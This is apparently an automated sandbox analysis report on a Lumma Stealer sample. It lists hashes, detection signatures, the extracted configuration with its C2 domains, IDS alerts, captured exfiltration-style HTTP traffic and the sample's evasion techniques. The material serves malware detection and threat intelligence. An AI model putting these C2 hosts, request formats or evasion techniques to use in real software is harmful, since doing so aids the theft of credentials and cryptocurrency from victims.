Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1538415
MD5:	7f65bd0a030aaf1f091fccbc602a321c
SHA1:	e7e097136bef14003a233dd3b67a5b25929b7abd
SHA256:	ab9b3c2e96eb0eb2eea2018eba01011fdfbb4e38cb1c0e87b799705fa7098d5c
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7F65BD0A030AAF1F091FCCBC602A321C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "dissapoiznw.store", "mobbipenju.store", "studennotediw.store", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:03.685458+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49705	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:03.685458+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49705	172.67.206.204	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.499329+0200	2056477	1	Domain Observed Used for C2 Detected	192.168.2.5	54921	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.411693+0200	2056471	1	Domain Observed Used for C2 Detected	192.168.2.5	63283	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.467683+0200	2056481	1	Domain Observed Used for C2 Detected	192.168.2.5	58291	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.434980+0200	2056483	1	Domain Observed Used for C2 Detected	192.168.2.5	56914	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.522527+0200	2056473	1	Domain Observed Used for C2 Detected	192.168.2.5	49842	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.424694+0200	2056485	1	Domain Observed Used for C2 Detected	192.168.2.5	61400	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.511159+0200	2056475	1	Domain Observed Used for C2 Detected	192.168.2.5	59805	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:00.487215+0200	2056479	1	Domain Observed Used for C2 Detected	192.168.2.5	63129	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T09:06:02.569079+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	23.199.218.33	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Found malware configuration

Source: file.exe.6160.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "dissapoiznw.store", "mobbipenju.store", "studennotediw.store", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: sergei-esenin.com	Virustotal: Detection: 19%			Perma Link
Source: eaglepawnoy.store	Virustotal: Detection: 18%			Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 49%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clearancek.site
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: licendfilteo.site
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: spirittunek.store
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bathdoomgaz.store
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: studennotediw.store
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: dissapoiznw.store
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: eaglepawnoy.store
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: mobbipenju.store
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clearancek.site
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00D050FA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00CCD110
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00CCD110
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	0_2_00D063B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	0_2_00D099D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	0_2_00D0695B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_00CCFCA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00CD0EEC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00D06094
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	0_2_00D04040
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	0_2_00CC1000
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	0_2_00CD6F91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec ebx	0_2_00CFF030
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_00CED1E1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00CD42FC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00CE2260
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [esi], ax	0_2_00CE2260
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_00CCA300
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	0_2_00D064B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	0_2_00D01440
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00CDD457
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_00CEC470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00CEE40C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	0_2_00CDB410
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	0_2_00CC8590
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00CE9510
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	0_2_00D07520
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00CD6536
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00CFB650
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00CEE66A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	0_2_00D067EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00CED7AF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	0_2_00D07710
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00D05700
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00CE28E9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_00CC49A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_00CDD961
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	0_2_00D03920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00CD1ACD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	0_2_00D04A40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_00CC5A50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00CD1A3C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	0_2_00CD1BEE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00CD3BE2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00CF0B80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	0_2_00CDDB6F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	0_2_00CDDB6F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	0_2_00D09B60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	0_2_00CECCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00CECCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	0_2_00CECCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00D09CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	0_2_00D09CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00CEAC91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], ax	0_2_00CEAC91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	0_2_00CEEC48
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	0_2_00CE7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	0_2_00CFFC20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00D08D8A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	0_2_00CEFD10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00CEDD29
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	0_2_00CD1E93
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00CC6EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	0_2_00CD6EBF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	0_2_00CCBEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	0_2_00CEAE57
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00CE7E60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00CE5E70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, ecx	0_2_00CD4E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00D05FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	0_2_00D07FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00D07FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], 0000h	0_2_00CDFFDF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00CC8FD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	0_2_00CD6F91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00CE9F62
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00CFFF70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:63129 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:56914 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:49842 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:63283 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:59805 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:54921 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:58291 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:61400 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.199.218.33:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.206.204:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: licendfilteo.site
Source: Malware configuration extractor	URLs: eaglepawnoy.store
Source: Malware configuration extractor	URLs: bathdoomgaz.store
Source: Malware configuration extractor	URLs: clearancek.site
Source: Malware configuration extractor	URLs: dissapoiznw.store
Source: Malware configuration extractor	URLs: mobbipenju.store
Source: Malware configuration extractor	URLs: studennotediw.store
Source: Malware configuration extractor	URLs: spirittunek.store

Source: Joe Sandbox View	IP Address: 23.199.218.33 23.199.218.33
Source: Joe Sandbox View	IP Address: 172.67.206.204 172.67.206.204

Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: clearancek.site
Source: global traffic	DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic	DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic	DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic	DNS traffic detected: DNS query: studennotediw.store
Source: global traffic	DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic	DNS traffic detected: DNS query: spirittunek.store
Source: global traffic	DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 21 Oct 2024 07:06:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNrqG1Ny4pdC4g1jvM3pI%2BuP5s0Jl%2BE5McRm4GzRsCMQPBiH%2FCa69OWwbi396sxYJZyyCdpRgTAgx5RjrZjnI9KAQpFhGxB4sFyMxwhYif3RPnxGhJoXyCiqBJNYRPn9SkYCcQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d5f671caf9c477e-DFW

Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.c
Source: file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/puL
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&l=en
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/lib
